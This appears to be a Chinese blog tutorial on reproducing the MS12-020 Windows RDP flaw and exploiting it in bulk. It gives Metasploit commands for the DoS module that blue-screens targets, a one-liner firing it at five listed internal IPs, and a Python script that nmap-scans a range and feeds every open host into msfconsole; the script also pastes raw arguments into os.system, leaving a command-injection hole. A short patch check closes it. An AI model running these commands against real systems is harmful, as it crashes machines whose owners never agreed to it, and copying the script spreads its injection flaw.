溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

MS12-020漏洞復現(xiàn)及自動化批量利用

發(fā)布時間:2020-06-21 11:07:43 來源:網(wǎng)絡 閱讀:1623 作者:Owefsad 欄目:安全技術

漏洞描述

Windows 遠程桌面協(xié)議漏洞,可執(zhí)行代碼,POC可導致藍屏。(RDP遠程桌面執(zhí)行代碼漏洞)

影響目標

Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2

msfpayload利用

msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost <ip>
run

此pyload僅支持單目標。

通過msfconsole快速啟動

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通過bash腳本批量生成檢測腳本(nmap-port2ip.py)

#encoding:utf-8
import xml.sax
import sys
import os

class MovieHandler( xml.sax.ContentHandler ):
   def __init__(self, filterport=None):
      self.CurrentData = ""
      self.port=filterport
      self.data = ""
      self.datas=[]

   # 元素開始事件處理
   def startElement(self, tag, attributes):
      self.CurrentData = tag
      if tag == "address":
         self.data=attributes["addr"]

   # 元素結(jié)束事件處理
   def endElement(self, tag):
      if self.CurrentData == "address":
         self.datas.append(self.data)
         self.data=""
      self.CurrentData = ""
class Gather(object):
    def __init__(self, filterport=None):
        # 創(chuàng)建一個 XMLReader
        self.parser = xml.sax.make_parser()
        # turn off namepsaces
        self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)

        # 重寫 ContextHandler
        self.Handler = MovieHandler(filterport)
        self.parser.setContentHandler( self.Handler )
    def run(self, port):
        self.Handler.datas=[]
        self.parser.parse(port+".xml")
        print(self.Handler.datas)
    def get_ans(self):
        return self.Handler.datas

if __name__ == "__main__":
    if len(sys.argv) !=3:
        os.exit()
    os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
    g = Gather()
    g.run(sys.argv[2])
    # create cmd
    cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'

    ips = g.get_ans()
    if len(ips)>0:
        for ip in g.get_ans():
            cmd += "set rhosts "+ip+";run;"
        cmd += 'exit;"'
        os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py <ip> <port>
# 功能:針對某種服務的漏洞對指定IP段的所有主機進行檢測,獲取可能存在問題的主機IP,并調(diào)用對應的Msf Payload進行利用嘗試。
# ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致
# port僅支持單端口

漏洞補丁檢測

systeminfo | find /i "KB2621440"
如果存在結(jié)果如下,證明已打補丁,否則,需要打?qū)难a丁。

Windows Server 2003補丁

參考文章

  1. 微軟MS12-020
向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI